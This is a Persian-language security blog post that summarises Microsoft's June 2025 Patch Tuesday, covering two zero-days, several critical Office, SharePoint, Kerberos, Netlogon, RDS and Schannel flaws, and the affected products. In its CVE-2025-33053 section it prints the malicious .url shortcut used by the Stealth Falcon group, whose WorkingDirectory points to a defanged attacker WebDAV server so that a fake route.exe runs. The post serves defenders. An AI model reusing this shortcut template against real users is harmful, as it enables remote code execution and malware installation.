مایکروسافت Patch Tuesday خودش رو برای ژوئن 2025 منتشر کرده و در اون به اصلاح 69 آسیب پذیری در محصولات مختلفش پرداخته.
با توجه به اینکه مایکروسافت آسیب پذیری هایی که قبل از اصلاح، بصورت عمومی منتشر بشن یا در حملاتی مورد اکسپلویت قرار بگیرن رو بعنوان زیرودی (0day) دسته بندی میکنه، بروزرسانی این ماه، دو آسیب پذیری زیرودی داره.
در آپدیت این ماه ، طبقه بندی آسیب پذیری ها به شرح زیر :
- افزایش امتیاز: 14
- اجرای کد: 27
- افشای اطلاعات: 17
- منع سرویس: 6
- جعل: 2
- دور زدن ویژگی های امنیتی: 3
شدت آسیب پذیری های اصلاح شده در این ماه هم بصورت زیر:
- شدت بحرانی : 10 مورد
- شدت بالا: 1 مورد
- شدت مهم: 57 مورد
- شدت متوسط: 1 مورد
آسیب پذیری اکسپلویت شده (0Day) :
آسیب پذیری CVE-2025-33053:
آسیب پذیری از نوع External Control of File Name or Path و در Web Distributed Authoring and Versioning (WEBDAV) هستش. امتیاز 8.8 و شدت مهم داره. آسیب پذیری امکان اجرای کد رو به مهاجم میده. برای اکسپلویت، نیاز هستش تا کاربر روی لینکی کلیک کنه.
WEBDAV یک افزونه برای پروتکل HTTP هستش که به کاربران امکان میده فایلها رو از راه دور مدیریت کنن. این پروتکل در بسیاری از نسخههای ویندوز وجود داره و در گذشته توسط Internet Explorer برای دسترسی به منابع اشتراکی استفاده میشده. با توجه به اینکه اینترنت اکسپلورر منسوخ شده، اما برخی برنامه ها ازش همچنان استفاده میکنن، این بروزرسانی برای ویندوزهای قدیمی هم ارائه شده.
آسیب پذیری توسط CheckPoint گزارش شده. گروه هکری Stealth Falcon که با نام FruityArmor هم شناخته میشه از مارس 2025 از این آسیب پذیری برای هدف قرار دادن سازمانهای دولتی در تورکیه، قطر، مصر و یمن استفاده کرده.
وقتی یک فایل url.، دایرکتوری WorkingDirectory خودش رو روی یک مسیر WebDAV راهدور تنظیم میکنه، ابزار داخلی ویندوز میتونه فریب داده بشه تا فایل اجرایی مخرب رو از اون جا اجرا کنه. این روش به مهاجم اجازه میده بدون نیاز به مستقر کردن فایل مخرب روی سیستم قربانی، کد دلخواه خودشون رو از طریق سرور WebDAV تحت کنترلشون اجرا کنن و این موضوع باعث میشه عملیاتشون مخفی باشه.
در مارس 2025 از این حمله روی یک شرکت دفاعی در تورکیه استفاده کرده بودن. حمله اینجوری بود که یک فایل url. رو به شکل یک فایل PDF جعلی از طریق ایمیل فیشینگ به قربانی ارسال کرده بودن.
اکسپلویت از این فایل url. شروع میشه که پارامتر URL اون به فایل iediagcmd.exe اشاره داره که ابزاری قانونی از Internet Explorer برای تشخیص مشکلات شبکه هستش. این ابزار، دستوراتی مثل route، ipconfig و netsh رو اجرا میکنه تا به عیبیابی شبکه کمک کنه. اما آسیبپذیری بدلیل نحوه اجرای این ابزارهای خط فرمان، توسط ویندوز قابل سوءاستفاده هستش.
1 2 3 4 5 6 7 |
[InternetShortcut] URL=C:\Program Files\Internet Explorer\iediagcmd.exe WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr ShowCommand=7 IconIndex=13 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Modified=20F06BA06D07BD014D |
وقتی iediagcmd.exe اجرا میشه، این ابزارهای تشخیصی با استفاده از تابع دات نتی Process.Start اجرا میشن که ابتدا دایرکتوری کاری فعلی رو برای یافتن برنامه بررسی میکنن، بعدش به دنبال اون در مسیرهای سیستمی مثل System32 میگردن.
در این حمله، فایل مخرب url. دایرکتوری کاری رو به سرور WebDAV مهاجم تنظیم میکنه و باعث میشه iediagcmd.exe ابزارها رو مستقیماً از اشتراک WebDAV راه دور اجرا کنه. در نتیجه، iediagcmd.exe بجای اجرای route.exe واقعی، نسخه جعلی اون رو از سرور مهاجم اجرا میکنه، که یک لودر چندمرحلهای به نام Horus Loader رو نصب میکنه. بعدش این لودر، پیلود اصلی بنام Horus Agent رو مستقر میکنه که یک ایمپلنت C2 سفارشی توسعه داده شده در ++C هستش که امکان اجرای دستور، دریافت اطلاعات سیستم، تغییر تنظیمات، تزریق شلکد، و انجام عملیات روی فایلها رو فراهم میکنه.
محصولات تحت تاثیر:
Windows Server 2022, 23H2 Edition
Windows 11 Version 23H2
Windows Server 2025
Windows 10 Version 22H2
Windows 11 Version 22H2
Windows 10 Version 21H2
Windows Server 2012 R2
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008
Windows Server 2016
Windows 10 Version 1607
Windows 10 for x64-based Systems
Windows 10 for x32-based Systems
Windows 11 Version 24H2
Windows 10 Version 21H2
Windows Server 2022
Windows Server 2019
Windows 10 Version 1809
آسیب پذیری های عمومی شده (0Day):
آسیب پذیری CVE-2025-33073:
آسیب پذیری از نوع Improper Access Control و در Windows SMB Client هستش. امتیاز 8.8 و شدت مهم داره و امکان افزایش امتیاز به SYSTEM رو میده. برای اکسپلویت نیاز هستش تا قربانی به یک سرور مخرب تحت کنترل مهاجم، وصل بشه. این آسیب پذیری قبلا عمومی شده.
محصولات تحت تاثیر:
Windows Server 2008 R2
Windows Server 2008
Windows Server 2016
Windows 10 Version 1607
Windows Server 2012 R2
Windows Server 2012
Windows 10 for x64-based Systems
Windows 10 for x32-based Systems
Windows Server 2025
Windows 11 Version 24H2
Windows Server 2022, 23H2 Edition
Windows 11 Version 23H2
Windows 10 Version 22H2
Windows 11 Version 22H2
Windows 10 Version 21H2
Windows Server 2022
Windows Server 2019
Windows 10 Version 1809
آسیب پذیری های بحرانی:
آسیب پذیری CVE-2025-47162:
آسیب پذیری از نوع Heap-based Buffer Overflow و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار آسیب پذیر هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته.
محصولات تحت تاثیر:
Microsoft Office 2016
Microsoft Office LTSC for Mac 2024
Microsoft Office LTSC 2024
Microsoft Office for Android
Microsoft Office LTSC 2021
Microsoft Office LTSC for Mac 2021
Microsoft 365 Apps for Enterprise
Microsoft Office 2019
آسیب پذیری CVE-2025-47164:
آسیب پذیری از نوع Use After Free و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.
محصولات تحت تاثیر:
Microsoft Office 2016
Microsoft Office LTSC for Mac 2024
Microsoft Office LTSC 2024
Microsoft Office for Android
Microsoft Office LTSC 2021
Microsoft Office LTSC for Mac 2021
Microsoft 365 Apps for Enterprise
Microsoft Office 2019
آسیب پذیری CVE-2025-47167:
آسیب پذیری از نوع Type Confusion و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.
محصولات تحت تاثیر:
Microsoft Office 2016
Microsoft Office LTSC for Mac 2024
Microsoft Office LTSC 2024
Microsoft Office for Android
Microsoft Office LTSC 2021
Microsoft Office LTSC for Mac 2021
Microsoft 365 Apps for Enterprise
Microsoft Office 2019
آسیب پذیری CVE-2025-47953:
آسیب پذیری از نوع Improper Restriction of Names for Files and Other Resources و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.
محصولات تحت تاثیر:
Microsoft Office 2016
Microsoft Office LTSC for Mac 2024
Microsoft Office LTSC 2024
Microsoft Office for Android
Microsoft Office LTSC 2021
Microsoft Office LTSC for Mac 2021
Microsoft 365 Apps for Enterprise
Microsoft Office 2019
آسیب پذیری CVE-2025-47172:
آسیب پذیری از نوع SQL Injection و در Microsoft SharePoint Server هستش. امتیاز 8.8 و شدت بحرانی داره و امکان اجرای کد رو به مهاجمی که احراز هویت کرده و حداقل پرمیشن های Site Member رو داره، میده.
محصولات تحت تاثیر:
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
آسیب پذیری CVE-2025-47966:
آسیب پذیری از نوع Exposure of Sensitive Information to an Unauthorized Actor و در Power Automate هستش. امتیاز 9.8 و شدت بحرانی داره و امکان افزایش امتیاز رو به مهاجم میده. این آسیب پذیری توسط مایکروسافت اصلاح شده و کاربران نیاز به کار خاصی ندارن. مایکروسافت صرفا برای شفاف سازی، گزارش کرده.
آسیب پذیری CVE-2025-33071:
آسیب پذیری از نوع Use After Free و در Windows Kerberos Key Distribution Center Proxy Service (KPSSVC) هستش. امتیاز 8.1 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم راه دور میده.
سرویس Kerberos KDC Proxy برای سناریوهایی مثل احراز هویت کاربران از طریق اینترنت یا شبکههای خارجی طراحی شده و نقش واسطهای برای رسیدن درخواستهای Kerberos به Domain Controller رو ایفا میکنه. آسیبپذیری در پروتکل رمزنگاری استفادهشده در این سرویس هستش و به مهاجم اجازه میده بدون نیاز به حساب کاربری، به سیستم حمله کنه. مهاجم با یک برنامه ی مخرب میتونه این باگ رو اکسپلویت کنه.
این آسیبپذیری فقط ویندوز سرورهایی رو تحت تأثیر قرار میده که بعنوان سرور پروتکل پراکسی Kerberos KDC ([MS-KKDCP]) پیکربندی شدن. Domain Controllerها تحت تأثیر این آسیب پذیری نیستن.
مهاجم برای اینکه بتونه با موفقیت این آسیب پذیری رو اکسپلویت کنه باید در یک Race Condition برنده بشه.
محصولات تحت تاثیر:
Windows Server 2012 R2
Windows Server 2012
Windows Server 2016
Windows Server 2025
Windows Server 2022, 23H2 Edition
Windows Server 2022
Windows Server 2019
آسیب پذیری CVE-2025-33070:
آسیب پذیری از نوع Use of Uninitialized Resource و در Windows Netlogon هستش. امتیاز 8.1 و شدت بحرانی داره و امکان افزایش امتیاز رو به مهاجم میده. مهاجم با ارسال درخواست های احرازهویت مخرب به Domain Controller، میتونه امتیازات Domain Administrator رو بدست بیاره (امتیاز سرویس Netlogon). البته برای اکسپلویت نیاز به شرایطی در محیط قربانی هستش.
محصولات تحت تاثیر:
Windows Server 2012 R2
Windows Server 2012
Windows Server 2008 R2
Windows Server 2016
Windows 10 Version 1607
Windows 10 for x64-based Systems
Windows 10 for x32-based Systems
Windows Server 2025
Windows 11 Version 24H2
Windows Server 2022, 23H2 Edition
Windows 11 Version 23H2
Windows 10 Version 22H2
Windows 11 Version 22H2
Windows 10 Version 21H2
Windows Server 2022
Windows Server 2019
Windows 10 Version 1809
آسیب پذیری CVE-2025-32710:
آسیب پذیری از نوع Race Condition و در Windows Remote Desktop Services هستش. امتیاز 8.1 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. مهاجم میتونه با تلاش برای اتصال به سیستمی که نقش Remote Desktop Gateway رو داره، از این آسیبپذیری سوءاستفاده کنه. در این فرآیند، یک Race Condition فعال میشه که منجر به ایجاد یک وضعیت Use-After-Free شده و مهاجم از این وضعیت برای اجرای کد دلخواه استفاده میکنه.
محصولات تحت تاثیر:
Windows Server 2012 R2
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008
Windows Server 2016
Windows Server 2025
Windows Server 2022, 23H2 Edition
Windows Server 2022
Windows Server 2019
آسیب پذیری CVE-2025-29828:
آسیب پذیری از نوع Missing Release of Memory after Effective Lifetime و در Windows Schannel هستش. امتیاز 8.1 و شدت بحرانی داره و امکان RCE رو به مهاجم میده. مهاجم میتونه با ارسال تعداد زیادی پیام مخرب و تکهتکهشده ClientHello به سروری که اتصالات Transport Layer Security (TLS) رو میپذیره، این آسیبپذیری رو اکسپلویت کنه.
محصولات تحت تاثیر:
Windows Server 2025
Windows 11 Version 24H2
Windows Server 2022, 23H2 Edition
Windows 11 Version 23H2
Windows Server 2025
Windows 11 Version 22H2
Windows Server 2022
لیست همه ی آسیب پذیری های ژوئن 2025 مایکروسافت:
منابع: